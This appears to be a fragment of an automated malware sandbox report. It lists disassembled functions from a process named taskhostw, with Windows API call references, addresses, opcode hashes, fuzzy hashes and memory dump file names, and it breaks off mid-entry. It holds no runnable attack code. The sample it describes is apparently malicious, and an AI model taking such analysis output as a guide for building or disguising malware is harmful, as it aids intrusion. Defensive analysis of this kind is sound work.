                                                                  Similarity
                                                                  • API ID: _wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 1735881322-0
                                                                  • Opcode ID: bff410fd89d59ec60ffbbd26d3f957a73104d33eefce5dacdf7aeb7e05c75cea
                                                                  • Instruction ID: 32aef46fc04d7596d97b68b15d83637acc89392969b5ebb3fb03c36f6f41d59f
                                                                  • Opcode Fuzzy Hash: bff410fd89d59ec60ffbbd26d3f957a73104d33eefce5dacdf7aeb7e05c75cea
                                                                  • Instruction Fuzzy Hash: 7E41A579C5021475CB11EBB58C45ADFB3ADAF49310F118866DA08E3222EF34A645C7ED
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00212550
                                                                  • GetMenuItemInfoW.USER32 ref: 0021259B
                                                                  • IsMenu.USER32(00000000), ref: 002125BB
                                                                  • CreatePopupMenu.USER32 ref: 002125EF
                                                                  • GetMenuItemCount.USER32(000000FF), ref: 0021264D
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0021267E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: e67338087040c36746676944958ea14e98ba3ecd95b8228509a92b2bde8c8057
                                                                  • Instruction ID: 6cadc35bdb13f23ca9900ffe7237a0636f46bf40956d19d2b86dafbd691425f8
                                                                  • Opcode Fuzzy Hash: e67338087040c36746676944958ea14e98ba3ecd95b8228509a92b2bde8c8057
                                                                  • Instruction Fuzzy Hash: A6519170910286EFCF24CF64E988AEEBBF9AF64314F144159F815A72D0D77099B8CB51
                                                                  APIs
                                                                    • Part of subcall function 002083D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002083E8
                                                                    • Part of subcall function 002083D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002083F2
                                                                    • Part of subcall function 002083D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00208401
                                                                    • Part of subcall function 002083D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00208408
                                                                    • Part of subcall function 002083D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0020841E
                                                                  • GetLengthSid.ADVAPI32(?,00000000,00208757), ref: 00208B8C
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00208B98
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00208B9F
                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00208BB8
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00208757), ref: 00208BCC
                                                                  • HeapFree.KERNEL32(00000000), ref: 00208BD3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                  • String ID:
                                                                  • API String ID: 3008561057-0
                                                                  • Opcode ID: c2619a4c040f1f484b8e545b7cc283857d532ee0e4d6069ee459a662c20736bf
                                                                  • Instruction ID: 8afe6a8b9b5444741e63b550c26bca603c7f2fcdf14f547deb4bfdc6dc12f19d
                                                                  • Opcode Fuzzy Hash: c2619a4c040f1f484b8e545b7cc283857d532ee0e4d6069ee459a662c20736bf
                                                                  • Instruction Fuzzy Hash: 9411E1B1920305FFDB508F64ED08FAF7BA8EB41319F104028E8C9D3191DB319915CB60
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0020890A
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00208911
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00208920
                                                                  • CloseHandle.KERNEL32(00000004), ref: 0020892B
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0020895A
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 0020896E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  • Opcode ID: 255ea5b2a337de94cee35e7275334d1ceed4d5b41cf1ef2fa1fc8468f2d306b5
                                                                  • Instruction ID: e9338aa8e1adb77c59e6d76d8be4a2948261b8ab7776d61d1f6e1bd7466e750c
                                                                  • Opcode Fuzzy Hash: 255ea5b2a337de94cee35e7275334d1ceed4d5b41cf1ef2fa1fc8468f2d306b5
                                                                  • Instruction Fuzzy Hash: CA115C7250024EEBDF018FA8EE49BEA7BA9EF08308F044065FE44A21A1C7718D60DB61
                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 02A79066
                                                                    • Part of subcall function 02A72707: __initp_misc_winsig.LIBCMT ref: 02A72725
                                                                  • __mtinitlocks.LIBCMT ref: 02A7906B
                                                                  • __mtterm.LIBCMT ref: 02A79074
                                                                    • Part of subcall function 02A790DC: _free.LIBCMT ref: 02A791DD
                                                                  • __calloc_crt.LIBCMT ref: 02A79099
                                                                  • __initptd.LIBCMT ref: 02A790BB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 206718379-0
                                                                  • Opcode ID: df2c190ed5a8e6e155ab4cb5216986f3d7981e2bbc06db2378fa24d28eb1e97e
                                                                  • Instruction ID: eaf04f9b28e89ea6be882d6727002997537dbd9a09928de978d6ebefb6ba9607
                                                                  • Opcode Fuzzy Hash: df2c190ed5a8e6e155ab4cb5216986f3d7981e2bbc06db2378fa24d28eb1e97e
                                                                  • Instruction Fuzzy Hash: 88F090726A97235EEA347779BE0579B2687DF01735F20062FE469C91D0EF1084424D9C
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D0313
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 001D031B
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D0326
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D0331
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 001D0339
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001D0341
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: ed5bc28af24556a26b990f67cfd0903136511b04c075b5de562b9c70b975a849
                                                                  • Instruction ID: 28fc2122eeadf6e3678d4d8550206adf6a1b0746d3ac3f6e393a40d77b7e6f6e
                                                                  • Opcode Fuzzy Hash: ed5bc28af24556a26b990f67cfd0903136511b04c075b5de562b9c70b975a849
                                                                  • Instruction Fuzzy Hash: 3B0148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7B5A864CFE5
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00208C5F
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00208C6B
                                                                  • CloseHandle.KERNEL32(?), ref: 00208C74
                                                                  • CloseHandle.KERNEL32(?), ref: 00208C7C
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00208C85
                                                                  • HeapFree.KERNEL32(00000000), ref: 00208C8C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: 73214c1ff029b49aece083ff57d3ab587ec670135c8829418255c7c703cdb59c
                                                                  • Instruction ID: 776a65ed191e551d894d1db1430b70864f394d3cf42ad0cea3006448077f7db6
                                                                  • Opcode Fuzzy Hash: 73214c1ff029b49aece083ff57d3ab587ec670135c8829418255c7c703cdb59c
                                                                  • Instruction Fuzzy Hash: 79E0C236404001FBDA411FE2FE0CD0ABB69FB89322B108230F21981070CB329424DB50
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00228728
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00228837
                                                                  • VariantClear.OLEAUT32(?), ref: 002289AF
                                                                    • Part of subcall function 0021760B: VariantInit.OLEAUT32(00000000), ref: 0021764B
                                                                    • Part of subcall function 0021760B: VariantCopy.OLEAUT32(00000000,?), ref: 00217654
                                                                    • Part of subcall function 0021760B: VariantClear.OLEAUT32(00000000), ref: 00217660
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: 0bfe85f3750d0eaf5ef9494db8d408ded27d2b859593c7be294177c9a478ea91
                                                                  • Instruction ID: c5a4548d9da5ca52cb82f7e65269d2f222632ae2958c061261dc5f2b7dcd02d8
                                                                  • Opcode Fuzzy Hash: 0bfe85f3750d0eaf5ef9494db8d408ded27d2b859593c7be294177c9a478ea91
                                                                  • Instruction Fuzzy Hash: 1791BF74618301EFC710EF64D48096ABBF4EF99314F14896DF88A8B361DB31E946CB52
                                                                  APIs
                                                                    • Part of subcall function 001CFE06: _wcscpy.LIBCMT ref: 001CFE29
                                                                  • _memset.LIBCMT ref: 00212E7F
                                                                  • GetMenuItemInfoW.USER32 ref: 00212EAE
                                                                  • SetMenuItemInfoW.USER32 ref: 00212F61
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00212F8F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: dc511f40e386e2d07ceca4e40288bb7063927872affb9771016f0c0a74aca4dd
                                                                  • Instruction ID: e0dd7fcc12b5ca691900574fc033ffe4db40d252bcae13a0ba3439a0e913e1f2
                                                                  • Opcode Fuzzy Hash: dc511f40e386e2d07ceca4e40288bb7063927872affb9771016f0c0a74aca4dd
                                                                  • Instruction Fuzzy Hash: 1851C131528302DFD7259F28D8446ABB7F4AF69310F144A2EF895D32A0DB70DDB98792
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: baeb9e31ddbaf4173c0651509a6a56fcde15c56c8cd70108d9e22f5ebaf20a36
                                                                  • Instruction ID: e7ba6d5f98624dbc05fc5a4727d2d71e86263f54d82ab17615e26ab1553bbb33
                                                                  • Opcode Fuzzy Hash: baeb9e31ddbaf4173c0651509a6a56fcde15c56c8cd70108d9e22f5ebaf20a36
                                                                  • Instruction Fuzzy Hash: 0B41D431218342DFD720DF24D885FAAB7E8AFA4324F10462DF965972D1D770EA68CB52
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf_memset_wcsncpy
                                                                  • String ID: :$\
                                                                  • API String ID: 214737766-1166558509
                                                                  • Opcode ID: d9f13931fe1ecb3a7cd7b22676f37d9688c132d911508ea83798b28eaf00ec4a
                                                                  • Instruction ID: 30d0494ecdae39ea1ad99de3f31afd01c463617143cd0de730909239f4197171
                                                                  • Opcode Fuzzy Hash: d9f13931fe1ecb3a7cd7b22676f37d9688c132d911508ea83798b28eaf00ec4a
                                                                  • Instruction Fuzzy Hash: 8131527550010AAADB219FA0DC84FEF77BDAF88744F1045B9FA08D6150EB709694CF68
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00236D6D
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00236D7D
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00236DA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox$NGAVQLK
                                                                  • API String ID: 3315199576-420986706
                                                                  • Opcode ID: c2f1d8e1d48a0ba4893ab896d138bd9078338dcf5c7f61dcc8ca886bcbfd0d40
                                                                  • Instruction ID: 5e53d75e9e1c95780250776011ef69118a5274bb572e56dda2d96e2d0fcf1721
                                                                  • Opcode Fuzzy Hash: c2f1d8e1d48a0ba4893ab896d138bd9078338dcf5c7f61dcc8ca886bcbfd0d40
                                                                  • Instruction Fuzzy Hash: 21219572620119BFDF118F54DC89FAB37BEEF89754F118124F9049B190C6719C618BA0
                                                                  APIs
                                                                    • Part of subcall function 001B1D35: CreateWindowExW.USER32 ref: 001B1D73
                                                                    • Part of subcall function 001B1D35: GetStockObject.GDI32(00000011), ref: 001B1D87
                                                                    • Part of subcall function 001B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001B1D91
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00236493
                                                                  • LoadLibraryW.KERNEL32(?), ref: 0023649A
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002364AF
                                                                  • DestroyWindow.USER32 ref: 002364B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  • Opcode ID: f468da3111a1a2cb26b4ea542ff84ac5e35b27756134f7ac6fc5ec7fdd2bd91c
                                                                  • Instruction ID: b0b7c904fd8468421d06b12dc39af622853d146e3b9ef23045b255d976ac5115
                                                                  • Opcode Fuzzy Hash: f468da3111a1a2cb26b4ea542ff84ac5e35b27756134f7ac6fc5ec7fdd2bd91c
                                                                  • Instruction Fuzzy Hash: 9C2180B1A20206BBEF204E64EC89EBA77ADEB59364F10C619FB5493190D771CC619760
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00216E65
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00216E98
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00216EAA
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00216EE4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 8fa966bc036c0cd929c89f2136c6e248271d62a79eb67f07027cf1e8ede63271
                                                                  • Instruction ID: 19a3c77bfa80ee3063abc306545a23c0984b1605cfffe6ff41c9ed4b01557f24
                                                                  • Opcode Fuzzy Hash: 8fa966bc036c0cd929c89f2136c6e248271d62a79eb67f07027cf1e8ede63271
                                                                  • Instruction Fuzzy Hash: 6F213579510206ABDB209F29EC0DEDE77F4AF65720F204719FDA1D72D0D77198A08B90
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00216F32
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00216F64
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00216F75
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00216FAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 31f398ddd1d84cde9e8a834bd40332c4eaf6aa2454a0bdf1b5652d56603f0b91
                                                                  • Instruction ID: 668343374777099a6b2bfb50db15d47fbd1cc318a14d75c46b07527c38084cb4
                                                                  • Opcode Fuzzy Hash: 31f398ddd1d84cde9e8a834bd40332c4eaf6aa2454a0bdf1b5652d56603f0b91
                                                                  • Instruction Fuzzy Hash: 3021A7755143069BDB209F69BC0CADE77E8BF65320F204659FCA2D76D0D77098A28B50
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0021ACDE
                                                                  • GetVolumeInformationW.KERNEL32 ref: 0021AD32
                                                                  • __swprintf.LIBCMT ref: 0021AD4B
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0023F910), ref: 0021AD89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  • Opcode ID: a667740d85fce0449807a1e6b08ea90c4ecd475b2c8cf05906e567210356914c
                                                                  • Instruction ID: 9fc83e47af6a3b850a26f744a3dab77eea3898f8b9340a925865b573cd16b2b9
                                                                  • Opcode Fuzzy Hash: a667740d85fce0449807a1e6b08ea90c4ecd475b2c8cf05906e567210356914c
                                                                  • Instruction Fuzzy Hash: 1C215074A00209AFCB10EF65DD85EEE7BF8EF89704B004069F509EB252DB71EA51DB61
                                                                  APIs
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                    • Part of subcall function 0020A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0020A179
                                                                    • Part of subcall function 0020A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0020A18C
                                                                    • Part of subcall function 0020A15C: GetCurrentThreadId.KERNEL32(00000000), ref: 0020A193
                                                                    • Part of subcall function 0020A15C: AttachThreadInput.USER32(00000000), ref: 0020A19A
                                                                  • GetFocus.USER32(0023F910), ref: 0020A334
                                                                    • Part of subcall function 0020A1A5: GetParent.USER32(?), ref: 0020A1B3
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0020A37D
                                                                  • EnumChildWindows.USER32 ref: 0020A3A5
                                                                  • __swprintf.LIBCMT ref: 0020A3BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
